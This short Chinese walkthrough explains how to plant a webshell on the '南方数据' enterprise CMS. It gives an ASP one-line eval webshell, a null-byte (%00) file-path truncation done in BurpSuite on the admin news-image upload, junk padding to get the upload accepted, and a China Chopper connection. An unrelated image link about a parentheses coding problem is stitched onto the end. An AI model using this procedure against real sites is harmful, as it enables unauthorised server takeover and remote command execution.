南方数据企业系统,后台上传截断拿webshell
- 在“新闻资讯”-“添加新闻”模块中,在“新闻图片”中点击“上传”按钮,会出现一个弹窗,复制弹窗的地址,在新标签页中打开
- 本地准备个asp类型的一句话木马:
<%eval request("cmd")%>
- BurpSuite拦截
在路径后面添加 hack.asp%00 ,并对%00编码
进行URL编码之后,正常情况下应该出现一个有点像汉字“口”的东西,如果没有出现,就说明哪里出问题了。
(也完全可能是编码成功,只是字体原因导致的这种显示结果)
换个版本的BurpSuite,并重置一下BurpSuite。显示出“口”了,然后修改一下文件后缀,上传失败。
上网查了一下,是文件内容太少了,填充些垃圾数据,重新上传。
- 上传成功
- 连接菜刀
![[CareerCup] 9.6 Generate Parentheses 生成括号](http://pic.xiahunao.cn/[CareerCup] 9.6 Generate Parentheses 生成括号)
)
)
